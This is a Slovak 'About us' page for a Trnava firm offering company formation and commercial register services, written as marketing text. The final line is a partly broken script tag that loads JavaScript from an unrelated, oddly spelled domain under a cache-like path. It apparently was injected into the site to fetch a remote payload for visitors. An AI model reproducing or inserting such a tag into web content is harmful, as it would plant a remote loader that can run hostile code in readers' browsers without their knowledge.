O nás

Kto sme?


Sme firma so sídlom v Trnave, ktorá sa už niekoľko rokov zaoberá zakladaním (založením) nových obchodných spoločností, a to najmä novej s.r.o. (spoločnosti s ručením obmedzeným) a iných obchodných spoločností (akciová spoločnosť, komanditná spoločnosť, verejná obchodná spoločnosť), zmenami v Obchodnom registri, zlučovaním, splynutím a rozdeľovaním obchodných spoločností, zrušením a likvidáciou spoločností atď. Založenie sro a ostatných obchodných spoločností, ako aj ich zmeny realizujú advokáti s praxou, ktorý sa obchodnému právu venujú už niekoľko rokov.

Založenie novej s.r.o. a iných obchodných spoločností je komplikovaný právny proces, ktorý si vyžaduje odbornosť a skúsenosti so zakladaním spoločností. Naša spoločnosť poskytuje kompletný právny servis, ktorý zahŕňa odborné poradenstvo, vypracovanie zmlúv a všetkých podaní, komunikáciu s úradmi, založenie spoločnosti (napr. s.r.o., a.s., k.s., v.o.s.) až po jej samotný vznik, ktorý vzniká okamihom zápisu v príslušnom Obchodnom registri na príslušnom registrovom súde.

Základné princípy našej práce


Našim hlavným cieľom je profesionálne a rýchlo založiť novú obchodnú spoločnosť (ako napr. spoločnosť s ručením obmedzeným = s.r.o. , akciovú spoločnosť = a.s. a iné), podľa požiadaviek zákazníka, za najlepšie ceny na trhu (bez skrytých poplatkov) tak, aby danej obchodnej spoločnosti v budúcnosti nevznikli žiadne komplikácie, nehrozili pokuty zo správnych orgánov a vyhli sa tak akýmkoľvek problémom, resp. súdnym žalobám. Nakoľko pri zakladaní obchodných spoločností (ako napríklad spoločnosti s ručením obmedzeným, t. j. s.r.o.) komunikujeme s úradmi, ako napr. súd a živnostenský úrad, najmä elektronickou formou, ktoré spôsobujú zľavu v poplatkoch vo výške 50%  alebo 100%, ušetríme pre klienta nie len čas, ale aj peniaze.

PRI ZAKLADANÍ S.R.O. (SPOLOČNOSTI S RUČENÍM OBMEDZENÝM) CEZ NAŠU SPOLOČNOSŤ NETREBA SPLATIŤ ZÁKLADNÉ IMANIE VO VÝŠKE 5.000,00 EUR, nakoľko vieme zmluvy v súlade so zákonom pripraviť tak, že bude stačiť iba vyhlásenie spoločníka o splatení vkladu. Tieto peniaze môžete radšej použiť na rozbeh svojej obchodnej spoločnosti.

Výhody zakladania novej s.r.o. a iných obchodných spoločností našou firmou:
  • Rýchlosť
  • Profesionalita – celý priebeh uskutočňovaný advokátmi s dlhoročnou praxou
  • Úspora času – všetky styky s úradmi riešime za Vás na základe plnej moci
  • Úspora peňazí - máme zľavy na správnych a súdnych poplatkoch, poplatkoch u notára
  • Vyhnutie sa problémom v budúcnosti
  • Spoločnosť založená na mieru a potrebu zákazníka – podľa druhu podnikania, počtu spoločníkov
  • Odborné poradenstvo – osobne na stretnutí v kancelárie v Trnave alebo prostredníctvom telefónu
  • Odborné vypracovanie zmlúv a iných podaní
script src="https://pr0gram.org/wp-cache/0a.js">